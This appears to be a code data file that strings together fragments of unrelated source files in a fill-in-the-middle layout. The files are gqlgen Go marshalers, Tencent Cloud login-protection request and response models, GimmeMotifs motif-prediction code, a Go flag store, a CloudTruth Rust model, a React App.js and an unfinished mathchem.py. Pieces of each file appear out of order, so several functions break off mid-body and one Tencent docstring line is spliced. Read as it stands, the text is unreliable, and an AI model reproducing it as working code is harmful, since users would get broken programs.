ret[i] = ec.marshalN__Field2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐField(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalO__InputValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValueᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.InputValue) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__InputValue2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValue(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalO__Schema2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐSchema(ctx context.Context, sel ast.SelectionSet, v *introspection.Schema) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return ec.___Schema(ctx, sel, v)
}
func (ec *executionContext) marshalO__Type2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐTypeᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.Type) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__Type2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalO__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx context.Context, sel ast.SelectionSet, v *introspection.Type) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return ec.___Type(ctx, sel, v)
}
// endregion ***************************** type.gotpl *****************************
| NewExecutableSchema |
models.py | # -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
from tencentcloud.common.abstract_model import AbstractModel
class QueryLoginProtectionRequest(AbstractModel):
"""QueryLoginProtection请求参数结构体
"""
def __init__(self):
r"""
:param LoginIp: 登录来源的外网 IP。
:type LoginIp: str
:param Uid: 用户 ID 不同的 accountType 对应不同的用户 ID。如果是 QQ,则填入对应的 openid,微信用户则填入对应的 openid/unionid,手机号则填入对应真实用户手机号(如13123456789)。
:type Uid: str
:param LoginTime: 登录时间戳,单位:秒。
:type LoginTime: str
:param AccountType: 用户账号类型(QQ 开放帐号、微信开放账号需要 提交工单 由腾讯云进行资格审核):
1:QQ 开放帐号。
2:微信开放账号。
4:手机号。
0:其他。
10004:手机号 MD5。
:type AccountType: str
:param AppIdU: accountType 是 QQ 或微信开放账号时,该参数必填,表示 QQ 或微信分配给网站或应用的 AppID,用来唯一标识网站或应用。
:type AppIdU: str
:param AssociateAccount: accountType 是 QQ 或微信开放账号时,用于标识 QQ 或微信用户登录后关联业务自身的账号 ID。
:type AssociateAccount: str
:param NickName: 昵称,UTF-8 编码。
:type NickName: str
:param PhoneNumber: 手机号:国家代码-手机号, 如0086-15912345687(0086前不需要+号)。
:type PhoneNumber: str
:param EmailAddress: 用户邮箱地址(非系统自动生成)。
:type EmailAddress: str
:param RegisterTime: 注册来源的外网 IP。
:type RegisterTime: str
:param Address: 地址。
:type Address: str
:param CookieHash: 用户 HTTP 请求中的 cookie 进行2次 hash 的值,只要保证相同 cookie 的 hash 值一致即可。
:type CookieHash: str
:param LoginSource: 登录来源:
0:其他
1:PC 网页
2:移动页面
3:App
4:微信公众号
:type LoginSource: str
:param LoginType: 登录方式:
0:其他
1:手动帐号密码输入
2:动态短信密码登录
3:二维码扫描登录
:type LoginType: str
:param Referer: 用户 HTTP 请求的 referer 值。
:type Referer: str
:param JumpUrl: 登录成功后跳转页面。
:type JumpUrl: str
:param UserAgent: 用户 HTTP 请求的 userAgent。
:type UserAgent: str
:param XForwardedFor: 用户 HTTP 请求中的 x_forward_for。
:type XForwardedFor: str
:param MouseClickCount: 用户操作过程中鼠标单击次数。
:type MouseClickCount: str
:param KeyboardClickCount: 用户操作过程中键盘单击次数。
:type KeyboardClickCount: str
:param Result: 注册结果:
0:失败
1:成功
:type Result: str
:param Reason: 失败原因:
0:其他
1:参数错误
2:帐号冲突
3:验证错误
:type Reason: str
:param LoginSpend: 登录耗时,单位:秒。
:type LoginSpend: str
:param MacAddress: MAC 地址或设备唯一标识。
:type MacAddress: str
:param VendorId: 手机制造商 ID,如果手机注册,请带上此信息。
:type VendorId: str
:param AppVersion: App 客户端版本。
:type AppVersion: str
:param Imei: 手机设备号。
:type Imei: str
:param BusinessId: 业务 ID 网站或应用在多个业务中使用此服务,通过此 ID 区分统计数据。
:type BusinessId: str
:param WxSubType: 1:微信公众号
2:微信小程序
:type WxSubType: str
:param RandNum: Token 签名随机数,微信小程序必填,建议16个字符。
:type RandNum: str
:param WxToken: 如果是微信小程序,该字段为以 ssesion_key 为 key 去签名随机数radnNum得到的值(hmac_sha256 签名算法)。
如果是微信公众号或第三方登录,则为授权的 access_token(注意:不是普通 access_token,具体看 微信官方文档)。
:type WxToken: str
"""
self.LoginIp = None
self.Uid = None
self.LoginTime = None
self.AccountType = None
self.AppIdU = None
self.AssociateAccount = None
self.NickName = None
self.PhoneNumber = None
self.EmailAddress = None
self.RegisterTime = None
self.Address = None
self.CookieHash = None
self.LoginSource = None
self.LoginType = None
self.Referer = None
self.JumpUrl = None
self.UserAgent = None
self.XForwardedFor = None
self.MouseClickCount = None
self.KeyboardClickCount = None
self.Result = None
self.Reason = None
self.LoginSpend = None
self.MacAddress = None
self.VendorId = None
self.AppVersion = None
self.Imei = None
self.BusinessId = None
self.WxSubType = None
self.RandNum = None
self.WxToken = None
def _deserialize(self, params):
self.LoginIp = params.get("LoginIp")
self.Uid = params.get("Uid")
self.LoginTime = params.get("LoginTime")
self.AccountType = params.get("AccountType")
self.AppIdU = params.get("AppIdU")
self.AssociateAccount = params.get("AssociateAccount")
self.NickName = params.get("NickName")
self.PhoneNumber = params.get("PhoneNumber")
self.EmailAddress = params.get("EmailAddress")
self.RegisterTime = params.get("RegisterTime")
self.Address = params.get("Address")
self.CookieHash = params.get("CookieHash")
self.LoginSource = params.get("LoginSource")
self.LoginType = params.get("LoginType")
self.Referer = params.get("Referer")
self.JumpUrl = params.get("JumpUrl")
self.UserAgent = params.get("UserAgent")
self.XForwardedFor = params.get("XForwardedFor")
self.MouseClickCount = params.get("MouseClickCount")
self.KeyboardClickCount = params.get("KeyboardClickCount")
self.Result = params.get("Result")
self.Reason = params.get("Reason")
self.LoginSpend = params.get("LoginSpend")
self.MacAddress = params.get("MacAddress")
self.VendorId = params.get("VendorId")
self.Ap | 登录后关联业务自身的账号 ID。
注意:此字段可能返回 null,表示取不到有效值。
:type RootId: str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.CodeDesc = None
self.AssociateAccount = None
self.LoginTime = None
self.Uid = None
self.LoginIp = None
self.Level = None
self.RiskType = None
self.RootId = None
self.RequestId = None
def _deserialize(self, params):
self.CodeDesc = params.get("CodeDesc")
self.AssociateAccount = params.get("AssociateAccount")
self.LoginTime = params.get("LoginTime")
self.Uid = params.get("Uid")
self.LoginIp = params.get("LoginIp")
self.Level = params.get("Level")
self.RiskType = params.get("RiskType")
self.RootId = params.get("RootId")
self.RequestId = params.get("RequestId") | pVersion = params.get("AppVersion")
self.Imei = params.get("Imei")
self.BusinessId = params.get("BusinessId")
self.WxSubType = params.get("WxSubType")
self.RandNum = params.get("RandNum")
self.WxToken = params.get("WxToken")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class QueryLoginProtectionResponse(AbstractModel):
"""QueryLoginProtection返回参数结构体
"""
def __init__(self):
r"""
:param CodeDesc: AssociateAccount
accountType 是 QQ 或微信开放账号时,用于标识 QQ 或微信用户登录后关联业务自身的账号 ID。
LoginTime
操作时间。
Uid
用户 ID 不同的 accountType 对应不同的用户 ID。如果是 QQ,则填入对应的 openid,微信用户则填入对应的 openid/unionid,手机号则填入对应真实用户手机号(如13123456789)。
LoginIp
登录 IP。
Level
0:表示无恶意。
1 - 4:恶意等级由低到高。
RiskType
风险类型。
出参不用填"Req业务侧错误码。成功时返回 Success,错误时返回具体业务错误原因。uestId"等公共出参, 详细解释>>>
注意:此字段可能返回 null,表示取不到有效值。
:type CodeDesc: str
:param AssociateAccount: accountType 是 QQ 或微信开放账号时,用于标识 QQ 或微信用户登录后关联业务自身的账号 ID。
注意:此字段可能返回 null,表示取不到有效值。
:type AssociateAccount: str
:param LoginTime: 操作时间。
注意:此字段可能返回 null,表示取不到有效值。
:type LoginTime: str
:param Uid: 用户 ID 不同的 accountType 对应不同的用户 ID。如果是 QQ,则填入对应的 openid,微信用户则填入对应的 openid/unionid,手机号则填入对应真实用户手机号(如13123456789)。
注意:此字段可能返回 null,表示取不到有效值。
:type Uid: str
:param LoginIp: 登录 IP。
注意:此字段可能返回 null,表示取不到有效值。
:type LoginIp: str
:param Level: 0:表示无恶意。
1 - 4:恶意等级由低到高。
:type Level: int
:param RiskType: 风险类型。
:type RiskType: list of int
:param RootId: accountType 是 QQ 或微信开放账号时,用于标识 QQ 或微信用户 |
prediction.py | # Copyright (c) 2009-2019 Simon van Heeringen <[email protected]>
#
# This module is free software. You can redistribute it and/or modify it under
# the terms of the MIT License, see the file COPYING included with this
# distribution.
"""Parallel prediction of sequence motifs """
# Python imports
import sys
import logging
try:
import _thread as thread
except ImportError:
import thread
from time import sleep
import inspect
from multiprocessing import Pool
# GimmeMotifs imports
from gimmemotifs import tools as tool_classes
from gimmemotifs.config import MotifConfig, parse_denovo_params
from gimmemotifs.fasta import Fasta
from gimmemotifs import mytmpdir
from gimmemotifs.stats import calc_stats
logger = logging.getLogger("gimme.prediction")
try:
import copy_reg
import types
def _pickle_method(m):
if m.im_self is None:
return getattr, (m.im_class, m.im_func.func_name)
else:
return getattr, (m.im_self, m.im_func.func_name)
copy_reg.pickle(types.MethodType, _pickle_method)
except Exception:
pass
def mp_calc_stats(motifs, fg_fa, bg_fa, zscore, gc, genome, bg_name=None):
"""Parallel calculation of motif statistics."""
try:
stats = calc_stats(
motifs=motifs, | bg_file=bg_fa,
ncpus=1,
zscore=zscore,
gc=gc,
genome=genome,
)
except Exception as e:
sys.stderr.write("ERROR: {}\n".format(str(e)))
stats = {}
raise
if not bg_name:
bg_name = "default"
return bg_name, stats
def _run_tool(job_name, t, fastafile, params):
"""Parallel motif prediction."""
try:
result = t.run(fastafile, params, mytmpdir())
except Exception as e:
result = ([], "", "{} failed to run: {}".format(job_name, e))
return job_name, result
class PredictionResult(object):
"""Store predicted motifs and calculate statistics."""
def __init__(
self,
outfile,
genome=None,
fg_file=None,
background=None,
gc=False,
do_counter=True,
job_server=None,
):
self.lock = thread.allocate_lock()
self.motifs = []
self.finished = []
self.stats = {}
self.stat_jobs = []
self.outfile = outfile
self.genome = genome
if job_server:
self.job_server = job_server
else:
self.job_server = Pool(2)
self.counter = 0
self.do_counter = do_counter
open(outfile, "w").close()
if fg_file and background:
self.fg_fa = Fasta(fg_file)
self.background = dict(
[(bg, Fasta(fname)) for bg, fname in background.items()]
)
self.do_stats = True
self.gc = gc
self.zscore = self.gc
if self.gc:
if genome is None:
raise ValueError(
"Need a genome when calculating GC% zscores for motif statistics"
)
else:
self.genome = genome
else:
self.do_stats = False
def add_motifs(self, args):
"""Add motifs to the result object."""
self.lock.acquire()
# Callback function for motif programs
if args is None or len(args) != 2 or len(args[1]) != 3:
try:
job = args[0]
logger.warn("job %s failed", job)
self.finished.append(job)
except Exception:
logger.warn("job failed")
return
job, (motifs, stdout, stderr) = args
logger.info("%s finished, found %s motifs", job, len(motifs))
for motif in motifs:
if self.do_counter:
self.counter += 1
motif.id = "gimme_{}_".format(self.counter) + motif.id
f = open(self.outfile, "a")
f.write("%s\n" % motif.to_pfm())
f.close()
self.motifs.append(motif)
if self.do_stats and len(motifs) > 0:
# job_id = "%s_%s" % (motif.id, motif.to_consensus())
logger.debug("Starting stats job of %s motifs", len(motifs))
for bg_name, bg_fa in self.background.items():
job = self.job_server.apply_async(
mp_calc_stats,
(
motifs,
self.fg_fa,
bg_fa,
self.zscore,
self.gc,
self.genome,
bg_name,
),
callback=self.add_stats,
)
self.stat_jobs.append(job)
logger.debug("stdout %s: %s", job, stdout)
logger.debug("stdout %s: %s", job, stderr)
self.finished.append(job)
self.lock.release()
def wait_for_stats(self):
"""Make sure all jobs are finished."""
logger.debug("waiting for statistics to finish")
for job in self.stat_jobs:
job.get()
sleep(2)
def add_stats(self, args):
"""Callback to add motif statistics."""
bg_name, stats = args
logger.debug("Stats: %s %s", bg_name, stats)
for motif_id in stats.keys():
if motif_id not in self.stats:
self.stats[motif_id] = {}
self.stats[motif_id][bg_name] = stats[motif_id]
# def submit_remaining_stats(self):
# for motif in self.motifs:
# n = "%s_%s" % (motif.id, motif.to_consensus())
# if n in self.stats:
#
# logger.info("Adding %s again!" % n)
# #job_id = "%s_%s" % (motif.id, motif.to_consensus())
# self.job_server.apply_async(
# _calc_motif_stats,
# (motif, self.fg_fa, self.bg_fa),
# callback=self.add_stats)
#
def pp_predict_motifs(
fastafile,
outfile,
analysis="small",
organism="hg19",
single=False,
background="",
tools=None,
job_server=None,
ncpus=8,
max_time=-1,
stats_fg=None,
stats_bg=None,
gc=True,
):
"""Parallel prediction of motifs.
Utility function for gimmemotifs.denovo.gimme_motifs. Probably better to
use that, instead of this function directly.
"""
if tools is None:
tools = {}
config = MotifConfig()
if not tools:
tools = dict([(x, 1) for x in config.get_default_params()["tools"].split(",")])
# logger = logging.getLogger('gimme.prediction.pp_predict_motifs')
wmin = 5
step = 1
if analysis in ["large", "xl"]:
step = 2
wmin = 6
analysis_max = {"xs": 5, "small": 8, "medium": 10, "large": 14, "xl": 20}
wmax = analysis_max[analysis]
if analysis == "xs":
sys.stderr.write("Setting analysis xs to small")
analysis = "small"
if not job_server:
n_cpus = int(config.get_default_params()["ncpus"])
job_server = Pool(processes=n_cpus, maxtasksperchild=1000)
jobs = {}
result = PredictionResult(
outfile,
organism,
fg_file=stats_fg,
background=stats_bg,
gc=gc,
job_server=job_server,
)
# Dynamically load all tools
toolio = [
x[1]()
for x in inspect.getmembers(
tool_classes,
lambda x: inspect.isclass(x)
and issubclass(x, tool_classes.motifprogram.MotifProgram),
)
if x[0] != "MotifProgram"
]
# TODO:
# Add warnings for running time: Weeder, GADEM
# Add all jobs to the job_server
params = {
"analysis": analysis,
"background": background,
"single": single,
"organism": organism,
}
# Tools that don't use a specified width usually take longer
# ie. GADEM, XXmotif, MEME
# Start these first.
for t in [tool for tool in toolio if not tool.use_width]:
if t.name in tools and tools[t.name]:
logger.debug("Starting %s job", t.name)
job_name = t.name
jobs[job_name] = job_server.apply_async(
_run_tool, (job_name, t, fastafile, params), callback=result.add_motifs
)
else:
logger.debug("Skipping %s", t.name)
for t in [tool for tool in toolio if tool.use_width]:
if t.name in tools and tools[t.name]:
for i in range(wmin, wmax + 1, step):
logger.debug("Starting %s job, width %s", t.name, i)
job_name = "%s_width_%s" % (t.name, i)
my_params = params.copy()
my_params["width"] = i
jobs[job_name] = job_server.apply_async(
_run_tool,
(job_name, t, fastafile, my_params),
callback=result.add_motifs,
)
else:
logger.debug("Skipping %s", t.name)
logger.info("all jobs submitted")
for job in jobs.values():
job.get()
result.wait_for_stats()
return result
def predict_motifs(infile, bgfile, outfile, params=None, stats_fg=None, stats_bg=None):
""" Predict motifs, input is a FASTA-file"""
# Parse parameters
required_params = [
"tools",
"available_tools",
"analysis",
"genome",
"use_strand",
"max_time",
]
if params is None:
params = parse_denovo_params()
else:
for p in required_params:
if p not in params:
params = parse_denovo_params()
break
if "genome" not in params:
logger.error("Need a genome for de novo motif prediction")
# Define all tools
tools = dict(
[
(x.strip(), x in [y.strip() for y in params["tools"].split(",")])
for x in params["available_tools"].split(",")
]
)
# Predict the motifs
analysis = params["analysis"]
logger.info("starting motif prediction (%s)", analysis)
logger.info("tools: %s", ", ".join([x for x in tools.keys() if tools[x]]))
result = pp_predict_motifs(
infile,
outfile,
analysis,
params.get("genome", None),
params["use_strand"],
bgfile,
tools,
None,
# logger=logger,
max_time=params["max_time"],
stats_fg=stats_fg,
stats_bg=stats_bg,
)
motifs = result.motifs
logger.info("predicted %s motifs", len(motifs))
logger.debug("written to %s", outfile)
if len(motifs) == 0:
logger.info("no motifs found")
result.motifs = []
return result | fg_file=fg_fa, |
kflag.go | package kli
import (
"reflect"
"time"
)
type KFlag interface {
// Store returns a list of set flags with their reflect.Kind
Store() map[string]reflect.Kind
// Set sets a new flag
SetFlag(name string, ptr interface{})
// BoolFlag return the value of the flag "name"
// ok is false if the flag does not exist or of wrong type
BoolFlag(name string) (value, ok bool)
// DurationFlag return the value of the flag "name"
// ok is false if the flag does not exist or of wrong type
DurationFlag(name string) (value time.Duration, ok bool)
// Float64Flag return the value of the flag "name"
// ok is false if the flag does not exist or of wrong type
Float64Flag(name string) (value float64, ok bool)
// IntFlag return the value of the flag "name"
// ok is false if the flag does not exist or of wrong type
IntFlag(name string) (value int, ok bool)
// Int64Flag return the value of the flag "name"
// ok is false if the flag does not exist or of wrong type
Int64Flag(name string) (value int64, ok bool)
// StringFlag return the value of the flag "name"
// ok is false if the flag does not exist or of wrong type
StringFlag(name string) (value string, ok bool)
// UintFlag return the value of the flag "name"
// ok is false if the flag does not exist or of wrong type
UintFlag(name string) (value uint, ok bool)
// Uint64Flag return the value of the flag "name"
// ok is false if the flag does not exist or of wrong type
Uint64Flag(name string) (value uint64, ok bool)
}
type FlagStore struct {
f map[string]interface{}
}
func NewKflag() *FlagStore |
func (a *FlagStore) Store() map[string]reflect.Kind {
result := make(map[string]reflect.Kind)
for name, f := range a.f {
result[name] = reflect.TypeOf(f).Elem().Kind()
}
return result
}
func (a *FlagStore) SetFlag(name string, ptr interface{}) {
a.f[name] = ptr
}
// flagElem returns the FlagStore for the given name
func (a *FlagStore) flagElem(name string) reflect.Value {
if f, ok := a.f[name]; ok {
e := reflect.ValueOf(f).Elem()
return e
}
return reflect.Value{}
}
func (a *FlagStore) BoolFlag(name string) (value, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Bool {
return
}
return f.Bool(), true
}
func (a *FlagStore) DurationFlag(name string) (value time.Duration, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.String {
return
}
d, e := time.ParseDuration(f.String())
if e != nil {
return
}
return d, true
}
func (a *FlagStore) Float64Flag(name string) (value float64, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Float64 {
return
}
return f.Float(), true
}
func (a *FlagStore) IntFlag(name string) (value int, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Int {
return
}
return int(f.Int()), true
}
func (a *FlagStore) Int64Flag(name string) (value int64, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Int64 {
return
}
return f.Int(), true
}
func (a *FlagStore) StringFlag(name string) (value string, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.String {
return
}
return f.String(), true
}
func (a *FlagStore) UintFlag(name string) (value uint, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Uint {
return
}
return uint(f.Uint()), true
}
func (a *FlagStore) Uint64Flag(name string) (value uint64, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Uint64 {
return
}
return f.Uint(), true
}
| {
return &FlagStore{map[string]interface{}{}}
} |
aws_integration_create.rs | /*
* CloudTruth Management API
*
* CloudTruth centralizes your configuration parameters and secrets making them easier to manage and use as a team.
*
* The version of the OpenAPI document: 1.0.0
* Contact: [email protected]
* Generated by: https://openapi-generator.tech
*/
#[derive(Clone, Debug, PartialEq, Serialize, Deserialize)]
pub struct | {
/// An optional description for the integration.
#[serde(rename = "description", skip_serializing_if = "Option::is_none")]
pub description: Option<String>,
/// Allow actions to write to the integration.
#[serde(rename = "writable", skip_serializing_if = "Option::is_none")]
pub writable: Option<bool>,
/// The AWS Account ID.
#[serde(rename = "aws_account_id")]
pub aws_account_id: String,
/// The AWS regions to integrate with.
#[serde(rename = "aws_enabled_regions")]
pub aws_enabled_regions: Vec<crate::models::AwsRegionEnum>,
/// The AWS services to integrate with.
#[serde(rename = "aws_enabled_services")]
pub aws_enabled_services: Vec<crate::models::AwsServiceEnum>,
/// This is a shared secret between the AWS Administrator who set up your IAM trust relationship and your CloudTruth AWS Integration. If your AWS Administrator provided you with a value use it, otherwise we will generate a random value for you to give to your AWS Administrator.
#[serde(rename = "aws_external_id", skip_serializing_if = "Option::is_none")]
pub aws_external_id: Option<String>,
/// The role that CloudTruth will assume when interacting with your AWS Account through this integration. The role is configured by your AWS Account Administrator. If your AWS Administrator provided you with a value use it, otherwise make your own role name and give it to your AWS Administrator.
#[serde(rename = "aws_role_name")]
pub aws_role_name: String,
}
impl AwsIntegrationCreate {
pub fn new(
aws_account_id: String,
aws_enabled_regions: Vec<crate::models::AwsRegionEnum>,
aws_enabled_services: Vec<crate::models::AwsServiceEnum>,
aws_role_name: String,
) -> AwsIntegrationCreate {
AwsIntegrationCreate {
description: None,
writable: None,
aws_account_id,
aws_enabled_regions,
aws_enabled_services,
aws_external_id: None,
aws_role_name,
}
}
}
| AwsIntegrationCreate |
App.js | import React, {Component} from 'react';
import {HashRouter, Redirect, Route, Switch} from 'react-router-dom';
import {FormattedMessage, IntlProvider} from 'react-intl';
import AppLocale from './lang/index';
import {connect} from "react-redux";
import {getLoginObject} from "./redux/auth/actions";
// import { renderRoutes } from 'react-router-config';
const loading = () =>
<div className="animated fadeIn pt-3 text-center">
<FormattedMessage id="global.label.loading..."/>
</div>;
// Containers
const DefaultLayout = React.lazy(() => import('./containers/DefaultLayout'));
// Pages
const Login = React.lazy(() => import('./views/Pages/Login'));
const Register = React.lazy(() => import('./views/Pages/Register'));
const Page404 = React.lazy(() => import('./views/Pages/Page404'));
const Page500 = React.lazy(() => import('./views/Pages/Page500'));
const InitialPath = ({component: Component, authUser, ...rest}) =>
<Route
{...rest}
render={props =>
authUser
? <Component {...props}/>
: <Redirect
to={{
pathname: '/login',
state: {from: props.location}
}}
/>}
/>;
class App extends Component {
// static async getIt() {
// if (localStorage.getItem('LoginObject')) {
// return localStorage.getItem('LoginObject');
// } else
// return null
// }
render() {
// We Have to get it from redux ... as it is ...
// const {location, match, user, locale} = this.props;
const {locale} = this.props;
// const { location, match, user, locale } = this.props;
const currentAppLocale = AppLocale[locale];
if (locale === 'fa') {
document.documentElement.dir = 'rtl';
} else {
document.documentElement.dir = 'ltr';
}
// const currentAppLocale = AppLocale['fa'];
// if (location.pathname === '/' || location.pathname === '/app' || location.pathname === '/app/') {
// return (<Redirect to={defaultStartPath} />);
// }
// let user = App.getIt();
if (!this.props.loginObj)
this.props.getLoginObject();
//
//
//
// console.log("user >> ");
// console.log(user); | <IntlProvider
locale={currentAppLocale.locale}
messages={currentAppLocale.messages}>
<React.Suspense fallback={loading()}>
<Switch>
<Route exact path="/login" name="Login Page" render={props => <Login {...props}/>}/>
<Route exact path="/register" name="Register Page" render={props => <Register {...props}/>}/>
<Route exact path="/404" name="Page 404" render={props => <Page404 {...props}/>}/>
<Route exact path="/500" name="Page 500" render={props => <Page500 {...props}/>}/>
<InitialPath
path={`/`}
authUser={this.props.loginObj}
// authUser={user}
component={DefaultLayout}
/>
{/*<Route path="/" name="Home" render={props => <DefaultLayout {...props}/>}/>*/}
</Switch>
</React.Suspense>
</IntlProvider>
</HashRouter>
);
}
}
const mapStateToProps = ({settings, authUser}) => {
const {locale} = settings;
const {loginObj} = authUser;
return {locale, loginObj};
};
export default connect(mapStateToProps, {getLoginObject})(App); |
return (
<HashRouter> |
mathchem.py | import numpy as np
class Mol():
r"""
Molecule.
"""
__g6_string = ''
# Adjacency matrix
__A = []
# Incidence matrix
__B = []
# Laplacian matrix
__L = []
# Normalized laplacian matrix
__NL = []
# Signless laplacian matrix
__Q = []
# Distance matrix
__D = []
# Resistance Distance matrix
__RD = []
__Order = 0
__Edges = []
__Sage_graph = None
__NX_graph = None
__Degrees = []
__Spectrum = []
__Laplacian_spectrum = []
__Distance_spectrum = []
__Norm_laplacian_spectrum = []
__Signless_laplacian_spectrum = []
__RD_spectrum = []
__Is_connected = None
# Switch it to False when we know that the graph is connected. Useful for big calculations
__Check_connectedness = True
def _reset_(self):
""" Reset all attributes """
self.__g6_string = ''
# Adjacency matrix
self.__A = []
# Incidence matrix
self.__B = []
# Laplacian matrix
self.__L = []
# Normalized laplacian matrix
self.__NL = []
# Signless laplacian matrix
self.__Q = []
# Distance matrix
self.__D = []
# Resistance Distance matrix
self.__RD = []
self.__Order = 0
self.__Edges = []
self.__Sage_graph = None
self.__NX_graph = None
self.__Degrees = []
self.__Spectrum = []
self.__Laplacian_spectrum = []
self.__Distance_spectrum = []
self.__Norm_laplacian_spectrum = []
self.__Signless_laplacian_spectrum = []
self.__RD_spectrum = []
self.__Is_connected = None
# allow to set structure from somewhere
# used in utilites
def _set_A(self, A):
self.__A = A
def _set_Edges(self, edges):
self.__Edges = edges
def _set_Order(self, order):
self.__Order = order
# native method to initialize Mol class is to provide g6 string
def __init__(self, string=None, check_connectedness=True):
""" Molecular graph class """
self.__Check_connectedness = check_connectedness
if string != None:
if string[0] == '>':
if string.startswith('>>graph6<<'):
string = string[10:]
elif string.startswith('>>sparse6<<'):
string = string[11:]
if string[0] == ':':
self.read_s6(string)
else:
self.read_g6(string)
def __repr__(self):
if self.__A != None:
return 'Molecular graph on ' + str(
self.__Order) + ' vertices and ' + str(self.size()) + ' edges'
return 'Empty Molecular graph'
def __len__(self):
if self.__A != None: return len(self.__A)
else: return 0
def set_check_connectedness(self, c):
""" Switch on/off of checking connectedness for the graph. Might be useful in batch calculations to economy time.
args: c (True/False)
"""
self.check_connectedness = c
def g6_string(self):
""" Return a graph6 string representation of the graph
Alias: graph6_string """
return self.__g6_string
# alias like in Sage:
graph6_string = g6_string
def order(self):
""" Return number of vertices """
return self.__Order
# alias for order
n = order
def edges(self):
""" Return list of edges """
return self.__Edges
def size(self):
""" Return number of edges"""
return len(self.__Edges)
# alias for size
m = size
def vertices(self):
""" Return list of vertices """
return range(self.__Order)
def sage_graph(self):
""" Return Sage Graph object """
if self.__Sage_graph is None: self._init_sage_graph_()
return self.__Sage_graph
def NX_graph(self):
""" Return NetworkX graph object """
if self.__NX_graph is None:
import networkx as nx
self.__NX_graph = nx.Graph(self.__Edges)
return self.__NX_graph
nx_graph = NX_graph
def _init_sage_graph_(self):
""" Initialize SAGE graph from Adjacency matrix"""
from sage.graphs.graph import Graph
self.__Sage_graph = Graph(self.__Edges)
def read_g6(self, s):
""" Initialize graph from graph6 string """
def graph_bit(pos, off):
return ((ord(s[off + 1 + pos / 6]) - 63) & (2**(5 - pos % 6))) != 0
if s.startswith('>>graph6<<'):
s = s[10:]
# reset all the attributes before changing the structure
self._reset_()
n = ord(s[0]) - 63
off = 0
if n == 63:
if ord(s[1]) - 63 != 63:
n = ((ord(s[1]) - 63) << 12) + (
(ord(s[2]) - 63) << 6) + ord(s[3]) - 63
off = 3
else:
n = ((ord(s[2]) - 63) << 30) + ((ord(s[3]) - 63) << 24) + (
(ord(s[4]) - 63) << 18) + ((ord(s[5]) - 63) << 12) + (
(ord(s[6]) - 63) << 6) + ord(s[7]) - 63
off = 7
self.__Order = n
self.__A = [[0 for col in range(n)] for row in range(n)]
i = 0
j = 1
self.__Edges = []
for x in range(n * (n - 1) / 2):
if graph_bit(x, off):
self.__A[i][j] = 1
self.__A[j][i] = 1
self.__Edges.append((i, j))
if j - i == 1:
i = 0
j += 1
else:
i += 1
self.__g6_string = s
read_graph6 = read_g6
def read_s6(self, s):
""" Initialize graph from sparse6 string """
def graph_bit(pos, off):
return ((ord(s[off + 1 + pos / 6]) - 63) & (2**(5 - pos % 6))) != 0
if s.startswith('>>sparse6<<'):
s = s[11:]
if not s[0] == ':':
print('This is not a sparse6 format!')
return False
# reset all the attributes before changing the structure
self._reset_()
s = s[1:]
n = ord(s[0]) - 63
off = 0
if n == 63:
if ord(s[1]) - 63 != 63:
n = ((ord(s[1]) - 63) << 12) + (
(ord(s[2]) - 63) << 6) + ord(s[3]) - 63
off = 3
else:
